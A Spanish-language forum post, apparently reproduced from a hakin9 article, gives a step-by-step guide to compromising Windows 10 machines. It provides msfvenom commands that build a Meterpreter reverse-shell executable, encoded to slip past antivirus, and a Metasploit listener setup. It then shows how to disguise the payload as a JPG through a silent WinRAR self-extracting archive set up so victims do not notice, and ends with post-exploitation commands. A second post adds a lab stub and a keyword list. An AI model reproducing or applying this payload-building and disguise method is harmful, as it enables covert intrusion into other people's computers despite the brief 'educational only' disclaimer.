▷ HACKEAN WINDOWS 10 con una IMAGEN | Kali Linux | Seguridad Informática

Responder
Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

▷ HACKEAN WINDOWS 10 con una IMAGEN | Kali Linux | Seguridad Informática

#1

Mensaje por admin »

Explotación de Windows 10 con una sola imagen

Imagen
 
Metasploit es lo último en el campo de la seguridad de la información y el control de penetración. Casi ha redefinido cómo podemos realizar pruebas de seguridad en nuestros sistemas.

La razón por la que Metasploit es tan popular es la amplia gama de tareas que puede realizar para facilitar la tarea de las pruebas de penetración para hacer que los sistemas sean más seguros.

Metasploit está disponible para todos los sistemas operativos populares.
En nuestra guía actual, trabajaremos principalmente en Kali Linux, con el programa Metasploit preinstalado y otras herramientas ejecutándose en él.¡Comencemos con Msfvenom, una suite que te permite crear el payload o la carga útil, en definitiva el archivo malicoso

El siguiente ejemplo tiene fines educativos SOLAMENTE. Bajo ninguna circunstancia debe ser utilizado para actividades ilegales.

Msfvenom es una herramienta útil para crear rápidamente códigos de shell, utilizando diferentes payloads o cargas útiles.Para crear un código de Shell que contenga un payload o una carga util para Windows 10, escriba el siguiente comando en su terminal:

Comando:

Código: Seleccionar todo

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > virus.exe
Para ver más opciones disponibles a la hora de ejecutar el comando, puede ingresar "msfvenom -h". Hay muchos parámetros interesantes a considerar. El parámetro -n crea un NOP sled de tamaño de payload. Otro parámetro interesante es -b, que nos permite evitar los caracteres comunes de un exploit, tales como un \x00. Esto puede ser muy útil para evitar los programas de antivirus.
Para usar msfvenom con codificación, debe crear un payload junto con un tipo de codificación como se muestra a continuación:

Comando:

Código: Seleccionar todo

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 LHOST=<your ip> LPORT=4444 -f exe > virus.exe
Ahora que nuestro archivo ejecutable está listo, necesitamos configurar nuestro listener en msfconsole para ver una conexión entrante desde la víctima en Windows 10, cuando nuestro objetivo ejecuta este archivo.
Para iniciar Metasploit, escriba msfconsole en su terminal.

Imagen
 
Ejecute el siguiente comando para iniciar el proceso multi/handler

Comando:

Código: Seleccionar todo

use exploit/multi/handler
Imagen


Ahora, Meterpreter es un payload avanzado que mejora en gran medida el poder de ejecutar comandos en nuestra máquina de destino. Es un intérprete de comandos que funciona con inyección de DLL en memoria y nos aporta muchas ventajas frente a los intérpretes de comandos tradicionales, ya que es más flexible, estable y escalable.

También puede funcionar con muchos payloads ejecutándose en la maquina de destino y en otras maquinas. Se comunica a través de stager y proporciona un Ruby API completo en el lado del cliente.

Primero usamos el módulo multi/handler en el primer paso y luego configuramos nuestro payload para que sea un shell inverso de Windows, para que coincida con el comportamiento del archivo ejecutable que creamos anteriormente con msfvenom,  por ejemplo configurar variables de LHOST y LPORT para el listener y nosotros están listos para comenzar. El listener es un Kali Linux pero puede ser un cualquier distribución de Ubuntu, arch, Debian, Parrot entre otros.
Por lo tanto, debe ingresar una serie de opciones de configuracion como se muestra a continuación:

Código: Seleccionar todo

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 4444
Imagen
 
Recuerde cambiar el LHOST con la dirección IP de su Kali Linux y el LPORT con los datos que configuraron en msfvenom Ahora, si envía directamente el archivo virus.exe (que creamos en el primer paso), nadie hará clic ni lo ejecutará debido a su nombre, pero si bloqueamos este archivo ejecutable con una imagen (jpg), entonces las posibilidades de que alguien lo ejecute son mayores.
Ahora vamos a hacer que nuestro ejecutable (virus.exe) se vea como una imagen, ya que en este momento el ícono es el predeterminado y es realmente feo.
Descargue su imagen JPG favorita de Internet y guárdela en el mismo directorio donde guardó su payload o carga util (virus.exe), según la captura de pantalla a continuación.


Imagen



Convertir esta imagen en archivo ICO. Puede hacerlo en el siguiente enlace: https://convertico.com/

Imagen


Ahora bajemos este archivo ICO en la misma carpeta donde habiamos bajado los dos anteriores


Imagen


 En el siguiente paso, debe crear un archivo que combine ambos archivos en uno, es decir (imagen.jpg y virus.exe), como se muestra a continuación:

Imagen



Después de eso, simplemente configure todas las cosas como se muestra en la siguiente captura de pantalla:
  • Filename: (Enter any name)
  • File format: RAR
  • Compression method: Better
  • Dictionary size: 256 MB
  • Archiving options: [Select] Create SFX archive
and then click the tab Advanced.


Imagen


En el tab de advanced, Click en SFX Options.


Imagen



 Se abrirá un nuevo cuadro de diálogo en el que deberá configurar algunas opciones, como:      Export Route: E: \ Aquí, no pongas C:\ en este campo porque cuando hagas clic en la imagen al final, te pedirá que lo ejecutes con privilegios de administrador y tu objetivo o target o vicitima fácilmente se dará cuenta de que se trata de un virus. Para engañarlo, usa siempre D:\ o E:\ o también puedes dejarlo en blanco.
Pero si deja este campo en blanco, exportará ambos archivos (image.jpg y virus.exe) al mismo directorio.

Imagen
 

Además, vaya a la segunda pestaña (setup) donde debe agregar dos líneas de código en las que la primera línea será el nombre de su imagen, es decir, image.jpg y la segunda línea contiene el nombre de su carga útil o payload que es virus. exe en el área "Execution after export”(Run after extraction).”

Imagen


Ahora también debe configurar el ícono (tab Text and Icon) como una miniatura en “Load SFX icon from file”(Load SFX icon from the file) para que el archivo se vea como un archivo de imagen adecuado. Aquí tienen que cargar el archivo ICO que generamos unos  pasos atras.

Imagen
 

Y también debe cambiar la opción Silent Mode a Ocultar todo (hidden all) en la sección "Funciones o Modes" como se muestra a continuación: (tab modes)

Imagen

 En el último paso, pero no menos importante, haga clic en "Reemplazar todos los archivos" en la pestaña Información (o Update), porque cada vez que el usuario abra esta imagen, los archivos exportados se reemplazarán inmediatamente en el mismo directorio que creamos en el paso anterior.

Imagen


Cuando alguien hace clic en esta imagen, se abrirá en el editor de fotos predeterminado y, al mismo tiempo, el archivo exe o el virus se ejecutará en segundo plano.

Imagen


De vuelta en nuestra máquina, es decir, Kali Linux, la sesión de Meterpreter se conectó con éxito y ahora tenemos acceso a nuestra máquina de destino (Windows 10), como se muestra a continuación.
Escriba el comando sysinfo para obtener más información sobre el sistema operativo y la arquitectura de destino.

Imagen


También puede ejecutar otros comandos útiles como pwd, getpid (ID de proceso actual) y screenshot (de la ventana acual del windows), etc.

Imagen


También puede tipear “? ", y te mostrará todos los comandos de Meterpreter disponibles, junto con una breve descripción.

Fuente:
https://hakin9.org/windows-10-exploitat ... sileiadis/
 
 
 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

Re: ▷ HACKEAN WINDOWS 10 con una IMAGEN | Kali Linux | Seguridad Informática

#2

Mensaje por admin »

LABORATORIO de TRABAJO

Imagen
 Imagen
 
VIDEO TUTORIAL






Pentesting Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Reverse connection Shell Telnet networking Handshake backdoor LAN | Local Area Network CMD execution How to Exploit and Test this Critical Vulnerability Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Debian Red Hat Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad detección de intrusos Networking Linux Ubuntu MacOS PowerPoint Access Hash cifrado descrifrar instalacion install PowerShell Step-by-Step Download o bajar database apache base de datos Vulnerabilidades CVE Perl SQL Injection Exploitation Explanation Burp suite Command Injection php Bypass All Security proxy VULNERABILITIES parrot Escalar privilegios en Linux Apache Nginx Routing redes hogareñas Server and Client in Python Localhost binaries certificates certificados OSI Model Modelo TCP/IP VPN metadatos kali linux ciberseguridad metadatos ciberseguridad information systems security professional how hackers hack into pc ehtical hacking cyber seguridad kali linux proteger computadoras kali linux 2.0 comptia security+ detección de intrusiones en la red kali linux tutorial naturalsoul metadatos de una imagen hacking etico ethical hacker servidores tutorial hackers how hackers do it linux Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,comandos,commands,remote function,laboratorio,lab,testing,servidor,como escalar privilegios en windows o linux,kernel vulnerable

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 4 invitados